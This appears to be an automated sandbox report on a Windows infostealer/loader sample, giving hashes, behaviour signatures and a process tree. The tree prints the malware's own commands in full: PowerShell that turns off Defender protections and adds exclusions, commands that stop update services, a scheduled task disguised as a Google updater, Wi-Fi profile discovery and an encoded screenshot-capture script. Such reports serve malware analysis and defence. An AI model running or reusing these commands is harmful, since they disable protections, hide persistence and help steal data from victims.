Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05-09-2024 11:30

General

  • Target

    loader.exe

  • Size

    14.4MB

  • MD5

    0b36da64b85e5abae7a93017d46dcce1

  • SHA1

    40506f88be2a8f9fc03083f8d934b58fe22c3ae5

  • SHA256

    0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903

  • SHA512

    a0a8fbb2127451ae7c776fff5e2d26d1d8e035527010f7f91a2904a76edfcaa054bf5becddc29fbe98e49bd211f8ae1f94c884e8e92c9b62984313cf843d9572

  • SSDEEP

    196608:tzElGkSaXkbEzeMeHJJ4u/RVyjwnx4YpXNzP0nreN:5ElGbFbEzVO4u/Rg9YTzF

Malware Config

Signatures

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 2 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:428
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:688
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:980
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:500
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:908
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1044
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1180
                    • C:\Program Files\Google\Chrome\updater.exe
                      "C:\Program Files\Google\Chrome\updater.exe"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Drops file in Program Files directory
                      PID:4108
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1192
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1248
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1296
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1376
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1412
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2920
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                • Indicator Removal: Clear Windows Event Logs
                                PID:1492
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1620
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1640
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                    1⤵
                                      PID:1684
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1716
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1752
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1856
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1868
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1940
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1948
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:2020
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1028
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2100
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2284
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2364
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2516
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2524
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                1⤵
                                                                  PID:2560
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                    PID:2624
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2652
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2692
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                          PID:2704
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2728
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:3000
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:700
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Suspicious use of UnmapMainImage
                                                                                PID:3260
                                                                                • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                  2⤵
                                                                                  • Drops file in Drivers directory
                                                                                  • Adds Run key to start application
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1548
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    3⤵
                                                                                      PID:2016
                                                                                    • C:\Windows\system32\attrib.exe
                                                                                      attrib +h +s C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                      3⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:1032
                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                      wmic os get Caption
                                                                                      3⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1876
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2596
                                                                                    • C:\Windows\system32\attrib.exe
                                                                                      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\WindowsSecurity.exe
                                                                                      3⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:1288
                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                      wmic cpu get Name
                                                                                      3⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2432
                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                      wmic path win32_VideoController get name
                                                                                      3⤵
                                                                                      • Detects videocard installed
                                                                                      PID:1140
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:3732
                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                      wmic csproduct get UUID
                                                                                      3⤵
                                                                                        PID:3716
                                                                                      • C:\Windows\system32\attrib.exe
                                                                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                        3⤵
                                                                                        • Drops file in Drivers directory
                                                                                        • Views/modifies file attributes
                                                                                        PID:1084
                                                                                      • C:\Windows\system32\attrib.exe
                                                                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                        3⤵
                                                                                        • Drops file in Drivers directory
                                                                                        • Views/modifies file attributes
                                                                                        PID:5068
                                                                                      • C:\Windows\system32\netsh.exe
                                                                                        netsh wlan show profiles
                                                                                        3⤵
                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                        PID:4448
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                        3⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2332
                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0drkbexr\0drkbexr.cmdline"
                                                                                          4⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4424
                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8FF.tmp" "c:\Users\Admin\AppData\Local\Temp\0drkbexr\CSCC87C0D4F40DA4DC191D9F2D642A2B336.TMP"
                                                                                            5⤵
                                                                                              PID:2736
                                                                                        • C:\Users\Admin\AppData\Local\Temp\.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\.exe
                                                                                          3⤵
                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Drops file in Program Files directory
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:904
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                        2⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:3408
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:228
                                                                                        • C:\Windows\System32\sc.exe
                                                                                          sc stop UsoSvc
                                                                                          3⤵
                                                                                          • Launches sc.exe
                                                                                          PID:1420
                                                                                        • C:\Windows\System32\sc.exe
                                                                                          sc stop WaaSMedicSvc
                                                                                          3⤵
                                                                                          • Launches sc.exe
                                                                                          PID:4540
                                                                                        • C:\Windows\System32\sc.exe
                                                                                          sc stop wuauserv
                                                                                          3⤵
                                                                                          • Launches sc.exe
                                                                                          PID:2964
                                                                                        • C:\Windows\System32\sc.exe
                                                                                          sc stop bits
                                                                                          3⤵
                                                                                          • Launches sc.exe
                                                                                          PID:1532
                                                                                        • C:\Windows\System32\sc.exe
                                                                                          sc stop dosvc
                                                                                          3⤵
                                                                                          • Launches sc.exe
                                                                                          PID:5108
                                                                                      • C:\Windows\System32\dialer.exe
                                                                                        C:\Windows\System32\dialer.exe
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2148
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfgfynpn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                        2⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:3088
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          3⤵
                                                                                            PID:5044
                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                          C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                          2⤵
                                                                                            PID:4872
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              3⤵
                                                                                                PID:2208
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                              2⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:3752
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                3⤵
                                                                                                  PID:4936
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                2⤵
                                                                                                  PID:2984
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    3⤵
                                                                                                      PID:2396
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop UsoSvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:4124
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop WaaSMedicSvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:1760
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop wuauserv
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:680
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop bits
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:4020
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop dosvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:4568
                                                                                                  • C:\Windows\System32\dialer.exe
                                                                                                    C:\Windows\System32\dialer.exe
                                                                                                    2⤵
                                                                                                      PID:2608
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfgfynpn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                      2⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:388
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        3⤵
                                                                                                          PID:3008
                                                                                                      • C:\Windows\System32\dialer.exe
                                                                                                        C:\Windows\System32\dialer.exe
                                                                                                        2⤵
                                                                                                          PID:2796
                                                                                                        • C:\Windows\System32\dialer.exe
                                                                                                          C:\Windows\System32\dialer.exe
                                                                                                          2⤵
                                                                                                            PID:3472
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                          1⤵
                                                                                                            PID:3436
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                            1⤵
                                                                                                              PID:3444
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:3804
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:3880
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                  1⤵
                                                                                                                    PID:3924
                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                    1⤵
                                                                                                                      PID:3932
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                      1⤵
                                                                                                                        PID:4276
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                        1⤵
                                                                                                                          PID:4384
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                          1⤵
                                                                                                                            PID:5016
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                            1⤵
                                                                                                                              PID:4232
                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                              1⤵
                                                                                                                                PID:4788
